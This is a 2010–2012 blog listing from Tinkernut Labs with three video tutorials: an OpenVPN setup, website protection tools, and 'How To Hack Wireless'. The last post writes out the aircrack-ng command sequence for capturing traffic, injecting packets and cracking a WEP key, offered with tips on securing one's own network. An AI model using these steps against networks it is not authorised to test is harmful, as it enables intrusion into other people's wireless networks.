Tinkernut Labs



  • Make Your Own Private Interwebz!

    August 18, 2012 // davisde // All Projects, Safety & Security Tags: business, desktop, guide, hackers, Hacks, home, how, laptop, network, networking, private, protection, safe, secure, server, tinkernut, tips, to, tricks, tutorial, virtual, vpn, wifi, wireless, work 11 Responses


    Stay secure on public wireless networks by making your own FREE virtual private network (VPN). This tutorial shows you how to set up an OpenVPN server and connect to it from your laptop.

    Links used in this video:
    http://www.openvpn.net
    http://tinkernut.com/wiki/page/Episode_328

  • How To Protect Your Website

    April 28, 2010 // davisde // Web Tips Tags: gfi, hackers, protect, scan, security, webmaster, website 4 Responses






    This video will show you how to monitor and protect your website.

    http://www.247webmonitoring.com/

    http://www.gfi.com/it-managed-services-software

    http://www.avg.com.au/resources/web-page-scanner/

    http://sucuri.net/index.php?page=home

  • How To Hack Wireless

    January 27, 2010 // davisde // Hacks, Web Tips Tags: free, hack, hackers, hacking, linux, protect, protection, steal, tinkernut, tips, tricks, tutorial, wi-fi, wifi, wireless 51 Responses


    This video shows one method of hacking a wireless WEP connection and gives you some tips on how to better secure your wireless.

    WEBSITES:
    http://www.backtrack-linux.org
    http://www.imgburn.com

    TERMINAL COMMANDS:
    Startx
    /etc/init.d/networking start
    airmon-ng
    airmon-ng stop [wireless card name]
    airmon-ng start [wireless card name]
    airmon-ng
    airodump-ng [wireless card name]
    ctrl c
    airodump-ng w wep c [channel number] bssid [Bssid number] [wireless card name]
    aireplay-ng -1 0 a [bssid] [wireless card name]
    aireplay-ng -3 b [bssid][wireless card name]
    ctrl + c
    dir
    aircrack-ng [filename]